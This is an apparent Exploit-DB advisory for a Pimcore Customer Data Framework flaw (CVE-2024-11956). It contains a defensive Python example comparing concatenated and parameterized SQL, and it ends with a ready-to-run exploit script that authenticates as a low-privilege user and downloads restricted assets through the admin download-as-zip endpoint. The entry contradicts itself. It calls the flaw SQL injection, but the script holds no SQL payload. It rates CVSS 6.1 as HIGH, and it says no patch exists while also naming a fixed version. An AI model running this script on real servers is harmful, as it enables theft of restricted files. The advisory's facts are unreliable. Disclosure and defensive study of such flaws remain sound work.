Vendor: Pimcore Customer Data Framework
By: maeitsec
CVSS: 6.1 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Pimcore Customer Data Framework
Affected Version From: 4.2.2000
Affected Version To: 10.5.20
Patch Exists: NO
CVE: CVE-2024-11956
CPE: pimcore:pimcore
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 20.04
Year: 2025

Pimcore Customer Data Framework 4.2.0 – SQL Injection

The Pimcore Customer Data Framework version 4.2.0 is vulnerable to SQL injection. An attacker can exploit it by supplying crafted input that is incorporated into SQL queries, potentially gaining unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, validate user input and pass it to the database only through parameterized queries, so that it can never be interpreted as SQL. Update to Pimcore version 10.5.21 or later, where the issue is fixed.
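The following added example illustrates the two halves of that mitigation side by side; it is not part of the Exploit-DB entry or of Pimcore's code base. The entry does not identify the injectable parameter, so the example assumes a list of asset ids like the ids[] field used in the script further down, and it models permissions with a constructed "allowed" column. Pimcore itself is PHP; Python with sqlite3 is used here only so the example runs stand-alone, and the same two steps (allowlist validation, then bound parameters) apply unchanged in any database layer.

```python
import re
import sqlite3

# Constructed sample table standing in for an asset table. The "allowed" flag
# represents whether the calling user may see the asset (assumption, not a
# Pimcore column).
SAMPLE_ASSETS = [
    (1, "/public/logo.png", 1),
    (2, "/public/banner.jpg", 1),
    (3, "/restricted/contracts.pdf", 0),
    (4, "/restricted/customers.csv", 0),
]

# Constructed malicious value: it closes the IN list early and appends an
# always-true condition, which is exactly what the vulnerable builder cannot tell
# apart from a real id.
INJECTED_IDS = ["1) OR (1=1"]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE assets (id INTEGER PRIMARY KEY, path TEXT, allowed INTEGER)")
    conn.executemany("INSERT INTO assets VALUES (?, ?, ?)", SAMPLE_ASSETS)
    return conn


def lookup_vulnerable(conn, ids):
    """Vulnerable pattern: request values are spliced straight into the SQL text."""
    id_list = ",".join(ids)
    sql = f"SELECT path FROM assets WHERE allowed = 1 AND id IN ({id_list}) ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


# Allowlist: an asset id is a plain decimal integer and nothing else.
ID_RE = re.compile(r"\d{1,18}")


def lookup_hardened(conn, ids):
    """Hardened pattern: validate every id, then bind it as a parameter."""
    for raw in ids:
        if not ID_RE.fullmatch(raw):
            raise ValueError(f"rejected non-numeric id: {raw!r}")
    int_ids = [int(raw) for raw in ids]
    if not int_ids:
        return []  # "IN ()" is not valid SQL, so answer the empty request directly
    # One placeholder per value; the driver sends the values separately from
    # the statement, so they can never change its structure.
    placeholders = ",".join("?" * len(int_ids))
    sql = f"SELECT path FROM assets WHERE allowed = 1 AND id IN ({placeholders}) ORDER BY id"
    return [row[0] for row in conn.execute(sql, int_ids)]


def run_demo():
    """Returns a summary of how both builders behave on legitimate and malicious input."""
    conn = make_db()
    legit = ["1", "2"]
    try:
        lookup_hardened(conn, INJECTED_IDS)
        hardened_rejects = False
    except ValueError:
        hardened_rejects = True
    return {
        "legit_hardened": lookup_hardened(conn, legit),
        "legit_vulnerable": lookup_vulnerable(conn, legit),
        # With the vulnerable builder the permission filter is bypassed entirely.
        "vulnerable_rows_on_injection": len(lookup_vulnerable(conn, INJECTED_IDS)),
        "hardened_rejects_injection": hardened_rejects,
    }


if __name__ == "__main__":
    print(run_demo())
```

Both builders return the same two public paths for a legitimate request; the difference shows only on the malicious value, where the concatenating version returns all four rows including the restricted ones, while the hardened version refuses the request before any SQL is executed. The validation step is what makes the error visible and loggable; the parameter binding is what makes the query safe even if validation were ever bypassed.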

Exploit-DB raw data:

# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956

import requests

# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"

# Authenticate and get session
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)

if "Login successful" in login_response.text:
    print("[+] Authenticated successfully.")

    # Exploit the downloadAsZip functionality
    download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
    payload = {
        "ids[]": ["1", "2", "3"]  # Replace with IDs of restricted files/folders
    }
    download_response = session.post(download_url, data=payload)

    if download_response.status_code == 200:
        print("[+] Exploit successful. Restricted files downloaded.")
        with open("restricted_files.zip", "wb") as f:
            f.write(download_response.content)
    else:
        print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
    print("[-] Authentication failed.")